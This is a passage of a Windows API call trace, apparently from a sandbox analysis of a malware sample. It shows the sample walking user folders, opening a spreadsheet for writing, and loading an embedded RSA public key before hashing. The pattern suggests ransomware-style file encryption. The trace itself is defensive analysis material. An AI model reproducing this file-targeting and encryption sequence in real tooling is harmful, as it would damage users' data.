Size=0x820) returned 0x37a2b08 [0235.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0235.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.814] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0235.815] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0235.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d0b8 [0235.815] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.815] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.815] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.815] PathFindFileNameW (pszPath="") returned="" [0235.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695168 [0235.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.819] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.819] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0235.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695168 [0235.819] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0235.819] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 1 [0235.819] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 0 [0235.819] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.820] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.820] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\") returned="OSDzZr1qU8Y-\\" [0235.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\") returned="eBkpfXutqqrq6h\\" [0235.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\") returned="X0h6NwRPaRX5m\\" [0235.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0235.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.820] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.820] PathFindFileNameW (pszPath="") returned="" [0235.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bb47bd0, ftCreationTime.dwHighDateTime=0x1d5e3b3, ftLastAccessTime.dwLowDateTime=0xaa71e670, ftLastAccessTime.dwHighDateTime=0x1d5d88c, ftLastWriteTime.dwLowDateTime=0xaa71e670, ftLastWriteTime.dwHighDateTime=0x1d5d88c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.823] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bb47bd0, ftCreationTime.dwHighDateTime=0x1d5e3b3, ftLastAccessTime.dwLowDateTime=0xaa71e670, ftLastAccessTime.dwHighDateTime=0x1d5d88c, ftLastWriteTime.dwLowDateTime=0xaa71e670, ftLastWriteTime.dwHighDateTime=0x1d5d88c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.823] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40d42ba0, ftCreationTime.dwHighDateTime=0x1d5e2f1, ftLastAccessTime.dwLowDateTime=0xc46ccd10, ftLastAccessTime.dwHighDateTime=0x1d5e629, ftLastWriteTime.dwLowDateTime=0xc46ccd10, ftLastWriteTime.dwHighDateTime=0x1d5e629, nFileSizeHigh=0x0, nFileSizeLow=0x115c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6cca_ ZmPO.ods", cAlternateFileName="6CCA_Z~1.ODS")) returned 1 [0235.823] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6cca_ ZmPO.ods") returned=".ods" [0235.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6cca_ ZmPO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\6cca_ zmpo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.825] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=71106) returned 1 [0235.825] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.828] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1159c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.828] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.830] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x115c2, lpOverlapped=0x0) returned 1 [0235.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.831] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0235.832] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.832] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.832] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.832] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.832] GetLastError () returned 0x0 [0235.832] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.832] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0235.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.833] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.833] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.833] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.833] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc588 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc570 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.836] GetCurrentThreadId () returned 0x314 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4ef0 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.837] GetCurrentThreadId () returned 0x314 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc570 [0235.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc588 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc600 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5a0 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc570 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: 